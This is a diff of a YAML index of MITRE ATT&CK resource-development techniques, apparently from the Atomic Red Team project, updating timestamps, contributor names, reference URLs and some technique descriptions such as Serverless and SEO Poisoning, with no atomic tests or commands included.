     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -64498,7 +65170,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -64585,11 +65257,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -64649,7 +65320,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -64691,7 +65361,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -64706,7 +65376,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -64797,11 +65466,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -64834,15 +65502,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -64926,7 +65595,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -64980,7 +65648,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -65031,36 +65698,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -65069,21 +65710,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -65129,17 +65796,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -65165,7 +65831,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -65197,8 +65863,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -65225,7 +65889,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -65249,8 +65913,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -65276,7 +65938,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -65310,8 +65972,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -65359,7 +66019,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -65375,7 +66035,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -65434,54 +66093,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -65492,22 +66107,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -65570,37 +66229,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -65624,11 +66284,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -65686,17 +66349,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -65704,7 +66368,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -65718,7 +66382,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -65751,11 +66415,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -65777,7 +66448,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -65795,47 +66466,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
